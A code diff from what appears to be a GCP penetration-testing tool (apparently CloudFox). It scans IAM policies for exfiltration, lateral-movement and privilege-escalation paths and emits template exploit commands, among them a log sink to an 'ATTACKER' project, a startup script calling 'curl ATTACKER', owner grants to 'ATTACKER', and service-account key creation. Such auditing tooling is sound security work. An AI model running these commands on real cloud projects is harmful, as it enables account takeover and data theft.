identity"}, + + // Cloud Composer - CRITICAL + {Permission: "composer.environments.create", Category: "Orchestration", RiskLevel: "CRITICAL", Description: "Create Composer environments with SA identity"}, + {Permission: "composer.environments.update", Category: "Orchestration", RiskLevel: "CRITICAL", Description: "Modify Composer environment configuration"}, + + // Cloud Build - CRITICAL + {Permission: "cloudbuild.builds.create", Category: "CI/CD", RiskLevel: "CRITICAL", Description: "Run builds with Cloud Build SA"}, + + // GKE - HIGH + {Permission: "container.clusters.getCredentials", Category: "GKE", RiskLevel: "HIGH", Description: "Get GKE cluster credentials"}, + {Permission: "container.pods.exec", Category: "GKE", RiskLevel: "HIGH", Description: "Exec into pods"}, + {Permission: "container.secrets.get", Category: "GKE", RiskLevel: "HIGH", Description: "Read Kubernetes secrets"}, + + // Secrets - HIGH + {Permission: "secretmanager.versions.access", Category: "Secrets", RiskLevel: "HIGH", Description: "Access secret values"}, + {Permission: "secretmanager.secrets.setIamPolicy", Category: "Secrets", RiskLevel: "HIGH", Description: "Grant access to secrets"}, + + // Deployment Manager - CRITICAL + {Permission: "deploymentmanager.deployments.create", Category: "Deployment", RiskLevel: "CRITICAL", Description: "Deploy arbitrary infrastructure with DM SA"}, + + // Workload Identity Federation - CRITICAL + {Permission: "iam.workloadIdentityPools.create", Category: "Federation", RiskLevel: "CRITICAL", Description: "Create workload identity pools for external access"}, + {Permission: "iam.workloadIdentityPoolProviders.create", Category: "Federation", RiskLevel: "CRITICAL", Description: "Create identity providers for external impersonation"}, + + // Org Policies - CRITICAL + {Permission: "orgpolicy.policy.set", Category: "Org Policy", RiskLevel: "CRITICAL", Description: "Disable organization policy constraints"}, + + // SA Usage + {Permission: "iam.serviceAccounts.actAs", Category: "SA Usage", RiskLevel: "HIGH", Description: "Use SA for resource creation"}, + } +} + +// AnalyzeOrganizationAttackPaths analyzes org-level IAM for attack paths +func (s *AttackPathService) AnalyzeOrganizationAttackPaths(ctx context.Context, pathType string) ([]AttackPath, map[string]string, []string, error) { + var paths []AttackPath + orgNames := make(map[string]string) + var orgIDs []string + + // Create organizations client + var orgsClient *resourcemanager.OrganizationsClient + var err error + if s.session != nil { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx, s.session.GetClientOption()) + } else { + orgsClient, err = resourcemanager.NewOrganizationsClient(ctx) + } + if err != nil { + return nil, orgNames, orgIDs, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer orgsClient.Close() + + // Get IAM service for role resolution + var iamService *iam.Service + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + iamService = nil + } + + // Get permission maps based on path type + exfilPermMap, lateralPermMap, privescPermMap := s.getPermissionMaps(pathType) + + // Search for organizations + searchReq := &resourcemanagerpb.SearchOrganizationsRequest{} + it := orgsClient.SearchOrganizations(ctx, searchReq) + for { + org, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + orgID := strings.TrimPrefix(org.Name, "organizations/") + orgNames[orgID] = org.DisplayName + orgIDs = append(orgIDs, orgID) + + // Get IAM policy for this organization + policy, err := orgsClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: org.Name, + }) + if err != nil { + continue + } + + // Analyze each binding + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, "") + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, "", + "organization", orgID, org.DisplayName, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + + return paths, orgNames, orgIDs, nil +} + +// AnalyzeFolderAttackPaths analyzes folder-level IAM for attack paths +func (s *AttackPathService) AnalyzeFolderAttackPaths(ctx context.Context, pathType string) ([]AttackPath, map[string]string, error) { + var paths []AttackPath + folderNames := make(map[string]string) + + // Create folders client + var foldersClient *resourcemanager.FoldersClient + var err error + if s.session != nil { + foldersClient, err = resourcemanager.NewFoldersClient(ctx, s.session.GetClientOption()) + } else { + foldersClient, err = resourcemanager.NewFoldersClient(ctx) + } + if err != nil { + return nil, folderNames, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + defer foldersClient.Close() + + // Get IAM service for role resolution + var iamService *iam.Service + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + iamService = nil + } + + // Get permission maps based on path type + exfilPermMap, lateralPermMap, privescPermMap := s.getPermissionMaps(pathType) + + // Search for folders + searchReq := &resourcemanagerpb.SearchFoldersRequest{} + it := foldersClient.SearchFolders(ctx, searchReq) + for { + folder, err := it.Next() + if err == iterator.Done { + break + } + if err != nil { + break + } + + folderID := strings.TrimPrefix(folder.Name, "folders/") + folderNames[folderID] = folder.DisplayName + + // Get IAM policy for this folder + policy, err := foldersClient.GetIamPolicy(ctx, &iampb.GetIamPolicyRequest{ + Resource: folder.Name, + }) + if err != nil { + continue + } + + // Analyze each binding + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, "") + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, "", + "folder", folderID, folder.DisplayName, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + + return paths, folderNames, nil +} + +// AnalyzeProjectAttackPaths analyzes project-level IAM for attack paths +func (s *AttackPathService) AnalyzeProjectAttackPaths(ctx context.Context, projectID, projectName, pathType string) ([]AttackPath, error) { + var paths []AttackPath + + // Get project IAM policy + var crmService *crmv1.Service + var err error + if s.session != nil { + crmService, err = crmv1.NewService(ctx, s.session.GetClientOption()) + } else { + crmService, err = crmv1.NewService(ctx) + } + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + policy, err := crmService.Projects.GetIamPolicy(projectID, &crmv1.GetIamPolicyRequest{}).Do() + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") + } + + // Get IAM service for role resolution + var iamService *iam.Service + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + iamService = nil + } + + // Get permission maps based on path type + exfilPermMap, lateralPermMap, privescPermMap := s.getPermissionMaps(pathType) + + // Analyze each binding + for _, binding := range policy.Bindings { + if binding == nil { + continue + } + + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "project", projectID, projectName, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + + return paths, nil +} + +// AnalyzeResourceAttackPaths analyzes resource-level IAM for attack paths +func (s *AttackPathService) AnalyzeResourceAttackPaths(ctx context.Context, projectID, pathType string) ([]AttackPath, error) { + var paths []AttackPath + + // Get permission maps based on path type + exfilPermMap, lateralPermMap, privescPermMap := s.getPermissionMaps(pathType) + + // Get IAM service for role resolution + var iamService *iam.Service + var err error + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + iamService = nil + } + + // Analyze GCS bucket IAM policies + bucketPaths := s.analyzeBucketIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) + paths = append(paths, bucketPaths...) + + // Analyze BigQuery dataset IAM policies + bqPaths := s.analyzeBigQueryIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) + paths = append(paths, bqPaths...) + + // Analyze Service Account IAM policies + saPaths := s.analyzeServiceAccountIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) + paths = append(paths, saPaths...) + + // Analyze Compute resource IAM (images, snapshots) + computePaths := s.analyzeComputeResourceIAM(ctx, projectID, pathType, exfilPermMap, lateralPermMap, privescPermMap, iamService) + paths = append(paths, computePaths...) + + return paths, nil +} + +// analyzeBucketIAM analyzes IAM policies on GCS buckets +func (s *AttackPathService) analyzeBucketIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { + var paths []AttackPath + + var storageService *storage.Service + var err error + if s.session != nil { + storageService, err = storage.NewService(ctx, s.session.GetClientOption()) + } else { + storageService, err = storage.NewService(ctx) + } + if err != nil { + return paths + } + + // List buckets in the project + buckets, err := storageService.Buckets.List(projectID).Do() + if err != nil { + return paths + } + + for _, bucket := range buckets.Items { + // Get IAM policy for this bucket + policy, err := storageService.Buckets.GetIamPolicy(bucket.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", fmt.Sprintf("gs://%s", bucket.Name), bucket.Name, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + + return paths +} + +// analyzeBigQueryIAM analyzes IAM policies on BigQuery datasets +func (s *AttackPathService) analyzeBigQueryIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { + var paths []AttackPath + + var bqService *bigquery.Service + var err error + if s.session != nil { + bqService, err = bigquery.NewService(ctx, s.session.GetClientOption()) + } else { + bqService, err = bigquery.NewService(ctx) + } + if err != nil { + return paths + } + + // List datasets in the project + datasets, err := bqService.Datasets.List(projectID).Do() + if err != nil { + return paths + } + + for _, dataset := range datasets.Datasets { + datasetID := dataset.DatasetReference.DatasetId + + // Get dataset to access IAM policy + ds, err := bqService.Datasets.Get(projectID, datasetID).Do() + if err != nil { + continue + } + + // BigQuery uses Access entries instead of standard IAM bindings + for _, access := range ds.Access { + member := "" + if access.UserByEmail != "" { + member = "user:" + access.UserByEmail + } else if access.GroupByEmail != "" { + member = "group:" + access.GroupByEmail + } else if access.SpecialGroup != "" { + member = access.SpecialGroup + } else if access.IamMember != "" { + member = access.IamMember + } + + if member == "" { + continue + } + + role := access.Role + permissions := s.getRolePermissions(iamService, "roles/bigquery."+strings.ToLower(role), projectID) + + memberPaths := s.analyzePermissionsForAttackPaths( + member, role, permissions, projectID, + "resource", fmt.Sprintf("%s:%s", projectID, datasetID), datasetID, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + + return paths +} + +// analyzeServiceAccountIAM analyzes IAM policies on service accounts +func (s *AttackPathService) analyzeServiceAccountIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { + var paths []AttackPath + + if iamService == nil { + var err error + if s.session != nil { + iamService, err = iam.NewService(ctx, s.session.GetClientOption()) + } else { + iamService, err = iam.NewService(ctx) + } + if err != nil { + return paths + } + } + + // List service accounts in the project + saList, err := iamService.Projects.ServiceAccounts.List("projects/" + projectID).Do() + if err != nil { + return paths + } + + for _, sa := range saList.Accounts { + // Get IAM policy for this service account + policy, err := iamService.Projects.ServiceAccounts.GetIamPolicy("projects/" + projectID + "/serviceAccounts/" + sa.Email).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", sa.Email, sa.DisplayName, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + + return paths +} + +// analyzeComputeResourceIAM analyzes IAM policies on compute resources (images, snapshots) +func (s *AttackPathService) analyzeComputeResourceIAM(ctx context.Context, projectID, pathType string, exfilPermMap map[string]DataExfilPermission, lateralPermMap map[string]LateralMovementPermission, privescPermMap map[string]PrivescPermission, iamService *iam.Service) []AttackPath { + var paths []AttackPath + + var computeService *compute.Service + var err error + if s.session != nil { + computeService, err = compute.NewService(ctx, s.session.GetClientOption()) + } else { + computeService, err = compute.NewService(ctx) + } + if err != nil { + return paths + } + + // Analyze images + images, err := computeService.Images.List(projectID).Do() + if err == nil { + for _, image := range images.Items { + policy, err := computeService.Images.GetIamPolicy(projectID, image.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", fmt.Sprintf("image/%s", image.Name), image.Name, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + } + + // Analyze snapshots + snapshots, err := computeService.Snapshots.List(projectID).Do() + if err == nil { + for _, snapshot := range snapshots.Items { + policy, err := computeService.Snapshots.GetIamPolicy(projectID, snapshot.Name).Do() + if err != nil { + continue + } + + for _, binding := range policy.Bindings { + permissions := s.getRolePermissions(iamService, binding.Role, projectID) + for _, member := range binding.Members { + memberPaths := s.analyzePermissionsForAttackPaths( + member, binding.Role, permissions, projectID, + "resource", fmt.Sprintf("snapshot/%s", snapshot.Name), snapshot.Name, + pathType, exfilPermMap, lateralPermMap, privescPermMap, + ) + paths = append(paths, memberPaths...) + } + } + } + } + + return paths +} + +// CombinedAttackPathAnalysis performs attack path analysis across all scopes +func (s *AttackPathService) CombinedAttackPathAnalysis(ctx context.Context, projectIDs []string, projectNames map[string]string, pathType string) (*CombinedAttackPathData, error) { + result := &CombinedAttackPathData{ + OrgPaths: []AttackPath{}, + FolderPaths: []AttackPath{}, + ProjectPaths: []AttackPath{}, + ResourcePaths: []AttackPath{}, + AllPaths: []AttackPath{}, + OrgNames: make(map[string]string), + FolderNames: make(map[string]string), + OrgIDs: []string{}, + } + + // Analyze organization-level IAM + orgPaths, orgNames, orgIDs, err := s.AnalyzeOrganizationAttackPaths(ctx, pathType) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAEXFILTRATION_MODULE_NAME, "Could not analyze organization attack paths") + } else { + result.OrgPaths = orgPaths + result.OrgNames = orgNames + result.OrgIDs = orgIDs + result.AllPaths = append(result.AllPaths, orgPaths...) + } + + // Analyze folder-level IAM + folderPaths, folderNames, err := s.AnalyzeFolderAttackPaths(ctx, pathType) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAEXFILTRATION_MODULE_NAME, "Could not analyze folder attack paths") + } else { + result.FolderPaths = folderPaths + result.FolderNames = folderNames + result.AllPaths = append(result.AllPaths, folderPaths...) + } + + // Analyze project-level IAM and resource-level IAM for each project + for _, projectID := range projectIDs { + projectName := projectID + if name, ok := projectNames[projectID]; ok { + projectName = name + } + + // Project-level + projectPathsList, err := s.AnalyzeProjectAttackPaths(ctx, projectID, projectName, pathType) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not analyze attack paths for project %s", projectID)) + continue + } + result.ProjectPaths = append(result.ProjectPaths, projectPathsList...) + result.AllPaths = append(result.AllPaths, projectPathsList...) + + // Resource-level + resourcePaths, err := s.AnalyzeResourceAttackPaths(ctx, projectID, pathType) + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_DATAEXFILTRATION_MODULE_NAME, + fmt.Sprintf("Could not analyze resource attack paths for project %s", projectID)) + continue + } + result.ResourcePaths = append(result.ResourcePaths, resourcePaths...) + result.AllPaths = append(result.AllPaths, resourcePaths...) + } + + return result, nil +} + +// Helper functions + +func (s *AttackPathService) getPermissionMaps(pathType string) (map[string]DataExfilPermission, map[string]LateralMovementPermission, map[string]PrivescPermission) { + exfilPermMap := make(map[string]DataExfilPermission) + lateralPermMap := make(map[string]LateralMovementPermission) + privescPermMap := make(map[string]PrivescPermission) + + if pathType == "exfil" || pathType == "all" { + for _, p := range GetDataExfilPermissions() { + exfilPermMap[p.Permission] = p + } + } + + if pathType == "lateral" || pathType == "all" { + for _, p := range GetLateralMovementPermissions() { + lateralPermMap[p.Permission] = p + } + } + + if pathType == "privesc" || pathType == "all" { + for _, p := range GetPrivescPermissions() { + privescPermMap[p.Permission] = p + } + } + + return exfilPermMap, lateralPermMap, privescPermMap +} + +func (s *AttackPathService) getRolePermissions(iamService *iam.Service, role string, projectID string) []string { + if iamService == nil { + return []string{} + } + + ctx := context.Background() + var roleInfo *iam.Role + var err error + + if strings.HasPrefix(role, "roles/") { + roleInfo, err = iamService.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "projects/") { + roleInfo, err = iamService.Projects.Roles.Get(role).Do() + } else if strings.HasPrefix(role, "organizations/") { + roleInfo, err = iamService.Organizations.Roles.Get(role).Do() + } else { + roleInfo, err = iamService.Roles.Get("roles/" + role).Do() + } + + if err != nil { + return s.getTestablePermissions(ctx, iamService, role, projectID) + } + + return roleInfo.IncludedPermissions +} + +func (s *AttackPathService) getTestablePermissions(ctx context.Context, iamService *iam.Service, role string, projectID string) []string { + // Return known permissions for common roles + knownRoles := map[string][]string{ + "roles/owner": { + "storage.objects.get", "storage.objects.list", "bigquery.tables.getData", + "compute.images.create", "compute.snapshots.create", "logging.sinks.create", + "compute.networks.addPeering", "compute.instances.setMetadata", + }, + "roles/editor": { + "storage.objects.get", "storage.objects.list", "bigquery.tables.getData", + "compute.images.create", "compute.snapshots.create", + "compute.instances.setMetadata", + }, + "roles/storage.objectViewer": { + "storage.objects.get", "storage.objects.list", + }, + "roles/bigquery.dataViewer": { + "bigquery.tables.getData", + }, + } + + if perms, ok := knownRoles[role]; ok { + return perms + } + return []string{} +} + +func (s *AttackPathService) analyzePermissionsForAttackPaths( + member, role string, permissions []string, projectID, + scopeType, scopeID, scopeName, pathType string, + exfilPermMap map[string]DataExfilPermission, + lateralPermMap map[string]LateralMovementPermission, + privescPermMap map[string]PrivescPermission, +) []AttackPath { + var paths []AttackPath + + // Skip allUsers/allAuthenticatedUsers for permission-based analysis + if member == "allUsers" || member == "allAuthenticatedUsers" { + return paths + } + + principalType := extractPrincipalType(member) + principal := extractPrincipalEmail(member) + + // Check for exfil permissions + for _, perm := range permissions { + if exfilPerm, ok := exfilPermMap[perm]; ok { + path := AttackPath{ + Principal: principal, + PrincipalType: principalType, + Method: perm, + TargetResource: scopeName, + Permissions: []string{perm}, + Category: exfilPerm.Category, + RiskLevel: exfilPerm.RiskLevel, + Description: exfilPerm.Description, + ExploitCommand: generateExfilCommand(perm, projectID, scopeID), + ProjectID: projectID, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + PathType: "exfil", + } + paths = append(paths, path) + } + } + + // Check for lateral movement permissions + for _, perm := range permissions { + if lateralPerm, ok := lateralPermMap[perm]; ok { + path := AttackPath{ + Principal: principal, + PrincipalType: principalType, + Method: perm, + TargetResource: scopeName, + Permissions: []string{perm}, + Category: lateralPerm.Category, + RiskLevel: lateralPerm.RiskLevel, + Description: lateralPerm.Description, + ExploitCommand: generateLateralCommand(perm, projectID, scopeID), + ProjectID: projectID, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + PathType: "lateral", + } + paths = append(paths, path) + } + } + + // Check for privesc permissions + for _, perm := range permissions { + if privescPerm, ok := privescPermMap[perm]; ok { + path := AttackPath{ + Principal: principal, + PrincipalType: principalType, + Method: perm, + TargetResource: scopeName, + Permissions: []string{perm}, + Category: privescPerm.Category, + RiskLevel: privescPerm.RiskLevel, + Description: privescPerm.Description, + ExploitCommand: generatePrivescCommand(perm, projectID, scopeID), + ProjectID: projectID, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, + PathType: "privesc", + } + paths = append(paths, path) + } + } + + return paths +} + +func extractPrincipalType(member string) string { + if strings.HasPrefix(member, "user:") { + return "user" + } else if strings.HasPrefix(member, "serviceAccount:") { + return "serviceAccount" + } else if strings.HasPrefix(member, "group:") { + return "group" + } else if strings.HasPrefix(member, "domain:") { + return "domain" + } + return "unknown" +} + +func extractPrincipalEmail(member string) string { + parts := strings.SplitN(member, ":", 2) + if len(parts) == 2 { + return parts[1] + } + return member +} + +func generateExfilCommand(permission, projectID, scopeID string) string { + switch permission { + case "compute.images.create": + return fmt.Sprintf("gcloud compute images create exfil-image --source-disk=DISK --source-disk-zone=ZONE --project=%s", projectID) + case "compute.snapshots.create": + return fmt.Sprintf("gcloud compute snapshots create exfil-snap --source-disk=DISK --source-disk-zone=ZONE --project=%s", projectID) + case "logging.sinks.create": + return fmt.Sprintf("gcloud logging sinks create exfil-sink pubsub.googleapis.com/projects/ATTACKER/topics/logs --project=%s", projectID) + case "storage.objects.get": + return fmt.Sprintf("gsutil cp gs://%s/OBJECT ./local --project=%s", scopeID, projectID) + case "bigquery.tables.getData": + return fmt.Sprintf("bq query --use_legacy_sql=false 'SELECT * FROM `%s.TABLE`'", scopeID) + case "secretmanager.versions.access": + return fmt.Sprintf("gcloud secrets versions access latest --secret=SECRET --project=%s", projectID) + default: + return fmt.Sprintf("# %s - refer to GCP documentation", permission) + } +} + +func generateLateralCommand(permission, projectID, scopeID string) string { + switch permission { + case "compute.networks.addPeering": + return fmt.Sprintf("gcloud compute networks peerings create peering --network=NET --peer-network=projects/TARGET/global/networks/NET --project=%s", projectID) + case "compute.instances.osLogin": + return fmt.Sprintf("gcloud compute ssh INSTANCE --zone=ZONE --project=%s", projectID) + case "compute.instances.setMetadata": + return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE --zone=ZONE --metadata=ssh-keys=\"user:$(cat ~/.ssh/id_rsa.pub)\" --project=%s", projectID) + case "iam.serviceAccounts.getAccessToken": + return fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", scopeID) + case "container.clusters.getCredentials": + return fmt.Sprintf("gcloud container clusters get-credentials CLUSTER --zone=ZONE --project=%s", projectID) + default: + return fmt.Sprintf("# %s - refer to GCP documentation", permission) + } +} + +func generatePrivescCommand(permission, projectID, scopeID string) string { + switch permission { + case "iam.serviceAccounts.getAccessToken": + return fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) + case "iam.serviceAccountKeys.create": + return fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) + case "iam.serviceAccounts.signBlob": + return fmt.Sprintf("# Sign blob as SA: gcloud iam service-accounts sign-blob --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) + case "iam.serviceAccounts.signJwt": + return fmt.Sprintf("# Sign JWT as SA: gcloud iam service-accounts sign-jwt --iam-account=TARGET_SA@%s.iam.gserviceaccount.com", projectID) + case "resourcemanager.projects.setIamPolicy": + return fmt.Sprintf("gcloud projects add-iam-policy-binding %s --member=user:ATTACKER --role=roles/owner", projectID) + case "resourcemanager.folders.setIamPolicy": + return fmt.Sprintf("gcloud resource-manager folders add-iam-policy-binding %s --member=user:ATTACKER --role=roles/owner", scopeID) + case "resourcemanager.organizations.setIamPolicy": + return fmt.Sprintf("gcloud organizations add-iam-policy-binding %s --member=user:ATTACKER --role=roles/owner", scopeID) + case "compute.instances.setMetadata": + return fmt.Sprintf("gcloud compute instances add-metadata INSTANCE --zone=ZONE --metadata=startup-script='#!/bin/bash\\ncurl ATTACKER' --project=%s", projectID) + case "cloudfunctions.functions.create": + return fmt.Sprintf("gcloud functions deploy pwn --runtime=python39 --trigger-http --project=%s --service-account=TARGET_SA", projectID) + case "run.services.create": + return fmt.Sprintf("gcloud run deploy pwn --image=ATTACKER_IMAGE --project=%s --service-account=TARGET_SA", projectID) + case "cloudbuild.builds.create": + return fmt.Sprintf("gcloud builds submit --config=cloudbuild.yaml --project=%s", projectID) + case "container.pods.exec": + return fmt.Sprintf("kubectl exec -it POD -- /bin/sh") + default: + return fmt.Sprintf("# %s - refer to GCP documentation", permission) + } +} diff --git a/gcp/services/privescService/privescService.go b/gcp/services/privescService/privescService.go deleted file mode 100644 index a0429382..00000000 --- a/gcp/services/privescService/privescService.go +++ /dev/null @@ -1,1087 +0,0 @@ -package privescservice - -import ( - "context" - "fmt" - "strings" - - iampb "cloud.google.com/go/iam/apiv1/iampb" - resourcemanager "cloud.google.com/go/resourcemanager/apiv3" - resourcemanagerpb "cloud.google.com/go/resourcemanager/apiv3/resourcemanagerpb" - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - crmv1 "google.golang.org/api/cloudresourcemanager/v1" - "google.golang.org/api/iam/v1" - "google.golang.org/api/iterator" -) - -type PrivescService struct { - session *gcpinternal.SafeSession -} - -var logger = internal.NewLogger() - -func New() *PrivescService { - return &PrivescService{} -} - -func NewWithSession(session *gcpinternal.SafeSession) *PrivescService { - return &PrivescService{session: session} -} - -// PrivescPath represents a privilege escalation opportunity -type PrivescPath struct { - Principal string `json:"principal"` // Who has this capability - PrincipalType string `json:"principalType"` // user, serviceAccount, group - Method string `json:"method"` // The privesc method name - TargetResource string `json:"targetResource"` // What resource they can escalate on - Permissions []string `json:"permissions"` // Permissions enabling this - RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM - Description string `json:"description"` // Explanation - ExploitCommand string `json:"exploitCommand"` // Command to exploit - ProjectID string `json:"projectId"` - // Scope information - where the role binding exists - ScopeType string `json:"scopeType"` // organization, folder, project - ScopeID string `json:"scopeId"` // The org/folder/project ID where binding exists - ScopeName string `json:"scopeName"` // Display name of the scope -} - -// CombinedPrivescData holds all privesc data across org/folder/project levels -type CombinedPrivescData struct { - OrgPaths []PrivescPath `json:"orgPaths"` - FolderPaths []PrivescPath `json:"folderPaths"` - ProjectPaths []PrivescPath `json:"projectPaths"` - AllPaths []PrivescPath `json:"allPaths"` - OrgNames map[string]string `json:"orgNames"` - FolderNames map[string]string `json:"folderNames"` - OrgIDs []string `json:"orgIds"` -} - -// DangerousPermission represents a permission that enables privilege escalation -type DangerousPermission struct { - Permission string `json:"permission"` - Category string `json:"category"` // SA Impersonation, Key Creation, IAM Modification, etc. - RiskLevel string `json:"riskLevel"` // CRITICAL, HIGH, MEDIUM - Description string `json:"description"` // What this enables -} - -// GetDangerousPermissions returns the list of known dangerous GCP permissions -// Based on: https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ -// and: https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/ -func GetDangerousPermissions() []DangerousPermission { - return []DangerousPermission{ - // Service Account Impersonation - CRITICAL - {Permission: "iam.serviceAccounts.getAccessToken", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Generate access tokens for any SA"}, - {Permission: "iam.serviceAccounts.signBlob", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign blobs as SA (GCS signed URLs)"}, - {Permission: "iam.serviceAccounts.signJwt", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Sign JWTs as SA (impersonation)"}, - {Permission: "iam.serviceAccounts.implicitDelegation", Category: "SA Impersonation", RiskLevel: "CRITICAL", Description: "Delegate SA identity to others"}, - - // Key Creation - CRITICAL - {Permission: "iam.serviceAccountKeys.create", Category: "Key Creation", RiskLevel: "CRITICAL", Description: "Create persistent SA keys"}, - {Permission: "storage.hmacKeys.create", Category: "Key Creation", RiskLevel: "HIGH", Description: "Create HMAC keys for S3-compatible access"}, - - // IAM Modification - CRITICAL - {Permission: "resourcemanager.projects.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify project-level IAM policy"}, - {Permission: "resourcemanager.folders.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify folder-level IAM policy"}, - {Permission: "resourcemanager.organizations.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify org-level IAM policy"}, - {Permission: "iam.serviceAccounts.setIamPolicy", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Grant access to service accounts"}, - {Permission: "iam.roles.update", Category: "IAM Modification", RiskLevel: "CRITICAL", Description: "Modify custom role permissions"}, - {Permission: "iam.roles.create", Category: "IAM Modification", RiskLevel: "HIGH", Description: "Create new custom roles"}, - - // Compute Access - HIGH - {Permission: "compute.instances.create", Category: "Compute", RiskLevel: "HIGH", Description: "Create compute instances"}, - {Permission: "compute.instances.setMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify instance metadata (SSH keys, startup scripts)"}, - {Permission: "compute.instances.setServiceAccount", Category: "Compute", RiskLevel: "HIGH", Description: "Change instance service account"}, - {Permission: "compute.disks.create", Category: "Compute", RiskLevel: "MEDIUM", Description: "Create compute disks"}, - {Permission: "compute.subnetworks.use", Category: "Compute", RiskLevel: "MEDIUM", Description: "Use subnetworks for instances"}, - {Permission: "compute.subnetworks.useExternalIp", Category: "Compute", RiskLevel: "MEDIUM", Description: "Assign external IPs to instances"}, - {Permission: "compute.projects.setCommonInstanceMetadata", Category: "Compute", RiskLevel: "HIGH", Description: "Modify project-wide metadata"}, - {Permission: "compute.instances.osLogin", Category: "Compute", RiskLevel: "MEDIUM", Description: "SSH into instances via OS Login"}, - {Permission: "compute.instances.osAdminLogin", Category: "Compute", RiskLevel: "HIGH", Description: "SSH with sudo via OS Login"}, - - // Cloud Functions - HIGH - {Permission: "cloudfunctions.functions.create", Category: "Serverless", RiskLevel: "HIGH", Description: "Deploy functions with SA identity"}, - {Permission: 